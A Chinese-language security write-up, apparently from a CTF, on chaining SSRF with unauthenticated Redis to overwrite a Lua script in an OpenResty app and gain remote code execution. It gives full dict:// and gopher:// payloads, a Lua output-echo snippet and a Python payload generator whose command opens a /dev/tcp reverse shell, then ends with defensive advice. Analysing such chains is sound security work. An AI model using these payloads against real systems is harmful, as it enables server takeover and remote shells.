SSRF漏洞利用Redis文件覆盖实现Lua回显RCE攻击分析<\/h1>

漏洞概述<\/h2>
本文分析了一个基于Lua Web项目的安全漏洞，攻击者可以通过SSRF漏洞结合Redis未授权访问，覆盖Lua脚本文件实现远程代码执行(RCE)。该漏洞存在于一个使用OpenResty(Nginx+Lua)构建的Web应用中，通过精心构造的请求可以完全控制服务器。<\/p>

环境分析<\/h2>

项目架构<\/h3>

Web框架<\/strong>：OpenResty (Nginx + Lua)<\/li>

关键组件<\/strong>：

Lua-cURL：用于HTTP请求<\/li>
lua-resty-redis：用于Redis操作<\/li> <\/ul> <\/li>
配置文件<\/strong>：

nginx.conf：定义Web服务配置<\/li>
main.lua：主处理脚本<\/li>
visit.script：包含业务逻辑的Lua脚本<\/li> <\/ul> <\/li> <\/ol>
Redis配置<\/h3>
关键安全缺陷：<\/p>

Redis运行在本地(127.0.0.1:6379)<\/li>
无密码认证(protected-mode yes<\/code>但无密码)<\/li>
攻击者可以通过SSRF访问Redis服务<\/li> <\/ul> 漏洞分析<\/h2> 主要漏洞点<\/h3> SSRF漏洞<\/strong>：<\/p> visit.script<\/code>中的URL参数直接用于cURL请求，无任何过滤<\/li> 可以访问内部服务，特别是Redis<\/li> <\/ul> <\/li> Redis未授权访问<\/strong>：<\/p> Redis无密码保护<\/li> 可通过SSRF访问<\/li> <\/ul> <\/li> Lua脚本动态加载<\/strong>：<\/p> main.lua<\/code>从文件读取并执行##LUA_START##<\/code>和##LUA_END##<\/code>之间的代码<\/li> Redis可覆盖\/scripts\/visit.script<\/code>文件<\/li> <\/ul> <\/li> <\/ol> 攻击链条<\/h3> 通过SSRF访问本地Redis服务<\/li> 利用Redis配置修改能力，设置工作目录为\/scripts\/<\/code><\/li> 将恶意Lua代码写入visit.script<\/code><\/li> 触发Lua脚本执行，实现RCE<\/li> <\/ol> 漏洞利用<\/h2> 利用步骤<\/h3> 清除Redis数据<\/strong>：<\/p> dict:\/\/127.0.0.1:6379\/flushall <\/code><\/pre> <\/li> 设置Redis工作目录<\/strong>：<\/p> dict:\/\/127.0.0.1:6379\/config:set:dir:\/scripts <\/code><\/pre> <\/li> 设置保存文件名<\/strong>：<\/p> dict:\/\/127.0.0.1:6379\/config:set:dbfilename:visit.script <\/code><\/pre> <\/li> 写入恶意Lua代码<\/strong>：<\/p> dict:\/\/127.0.0.1:6379\/set:a:"\x23\x23\x4c\x55\x41\x5f\x53\x54\x41\x52\x54\x23\x23\x6f\x73\x2e\x65\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x22\x29\x23\x23\x4c\x55\x41\x5f\x45\x4e\x44\x23\x23" <\/code><\/pre> (十六进制解码后为：##LUA_START##os.execute("cmd")##LUA_END##<\/code>)<\/p> <\/li> 保存到文件<\/strong>：<\/p> dict:\/\/127.0.0.1:6379\/save <\/code><\/pre> <\/li> <\/ol> 回显技术<\/h3> 当目标不出网时，可以通过以下方式回显命令执行结果：<\/p> local<\/span> handle =<\/span> io.popen('\/readflag'<\/span>) <\/span><\/span>local<\/span> output =<\/span> handle:read("*a"<\/span>) <\/span><\/span>handle:close() <\/span><\/span>ngx.say("<html><body>"<\/span>) <\/span><\/span>ngx.say("<h1>Command Output:<\/h1>"<\/span>) <\/span><\/span>ngx.say("<pre>"<\/span>..<\/span>ngx.escape_html(output)..<\/span>"<\/pre>"<\/span>) <\/span><\/span><\/code><\/pre>自动化工具<\/h3> 可以使用修改版的gopherus工具生成攻击payload：<\/p> import<\/span> urllib <\/span><\/span> <\/span><\/span>def<\/span> get_Redis_LuaShell<\/span>(): <\/span><\/span> file=<\/span>"visit.script"<\/span> <\/span><\/span> dir=<\/span>"\/scripts"<\/span> <\/span><\/span> cmd =<\/span> '##LUA_START##os.execute("bash -c <\/span>\'<\/span>sh -i &>\/dev\/tcp\/ip\/port 0>&1<\/span>\'<\/span>")##LUA_END##'<\/span> <\/span><\/span> len_cmd =<\/span> len(cmd) +<\/span> 5<\/span> <\/span><\/span> payload =<\/span> """*1<\/span>\r<\/span> <\/span><\/span><\/span>$8<\/span>\r<\/span> <\/span><\/span><\/span>flushall<\/span>\r<\/span> <\/span><\/span><\/span>*3<\/span>\r<\/span> <\/span><\/span><\/span>$3<\/span>\r<\/span> <\/span><\/span><\/span>set<\/span>\r<\/span> <\/span><\/span><\/span>$1<\/span>\r<\/span> <\/span><\/span><\/span>1<\/span>\r<\/span> <\/span><\/span><\/span>$"""<\/span> +<\/span> str(len_cmd) +<\/span> """<\/span>\r<\/span> <\/span><\/span><\/span>"""<\/span> +<\/span> cmd +<\/span> """ <\/span>\r<\/span> <\/span><\/span><\/span>*4<\/span>\r<\/span> <\/span><\/span><\/span>$6<\/span>\r<\/span> <\/span><\/span><\/span>config<\/span>\r<\/span> <\/span><\/span><\/span>$3<\/span>\r<\/span> <\/span><\/span><\/span>set<\/span>\r<\/span> <\/span><\/span><\/span>$3<\/span>\r<\/span> <\/span><\/span><\/span>dir<\/span>\r<\/span> <\/span><\/span><\/span>$"""<\/span> +<\/span> str(len(dir)) +<\/span> """<\/span>\r<\/span> <\/span><\/span><\/span>"""<\/span> +<\/span> dir +<\/span> """<\/span>\r<\/span> <\/span><\/span><\/span>*4<\/span>\r<\/span> <\/span><\/span><\/span>$6<\/span>\r<\/span> <\/span><\/span><\/span>config<\/span>\r<\/span> <\/span><\/span><\/span>$3<\/span>\r<\/span> <\/span><\/span><\/span>set<\/span>\r<\/span> <\/span><\/span><\/span>$10<\/span>\r<\/span> <\/span><\/span><\/span>dbfilename<\/span>\r<\/span> <\/span><\/span><\/span>$"""<\/span>+<\/span>str(len(file))+<\/span>"""<\/span>\r<\/span> <\/span><\/span><\/span>"""<\/span>+<\/span>file+<\/span>"""<\/span>\r<\/span> <\/span><\/span><\/span>*1<\/span>\r<\/span> <\/span><\/span><\/span>$4<\/span>\r<\/span> <\/span><\/span><\/span>save<\/span>\r<\/span> <\/span><\/span><\/span>"""<\/span> <\/span><\/span> finalpayload =<\/span> urllib.<\/span>quote_plus(payload).<\/span>replace("+"<\/span>,"%20"<\/span>).<\/span>replace("<\/span>%2F<\/span>"<\/span>,"\/"<\/span>).<\/span>replace("%25"<\/span>,"%"<\/span>).<\/span>replace("%3A"<\/span>,":"<\/span>) <\/span><\/span> print "gopher:\/\/127.0.0.1:6379\/_"<\/span> +<\/span> finalpayload <\/span><\/span><\/code><\/pre>防御措施<\/h2> SSRF防护<\/strong>：<\/p> 限制URL参数只能访问特定域名或IP<\/li> 禁用危险协议(file:\/\/, dict:\/\/, gopher:\/\/等)<\/li> 使用白名单验证URL<\/li> <\/ul> <\/li> Redis安全<\/strong>：<\/p> 设置强密码<\/li> 启用protected-mode<\/li> 绑定特定IP<\/li> <\/ul> <\/li> Lua脚本安全<\/strong>：<\/p> 避免动态执行未经验证的代码<\/li> 对脚本内容进行严格校验<\/li> 限制文件写入权限<\/li> <\/ul> <\/li> 其他措施<\/strong>：<\/p> 启用lua_code_cache提高性能和安全<\/li> 使用最小权限原则运行服务<\/li> 定期更新OpenResty和依赖库<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 该漏洞展示了SSRF如何与其他配置缺陷结合形成严重的安全威胁。开发人员应当：<\/p> 永远不信任用户输入<\/li> 最小化服务暴露面<\/li> 实施深度防御策略<\/li> 定期进行安全审计<\/li> <\/ol> 通过多层次的防护措施，可以有效防止此类攻击的发生。<\/p>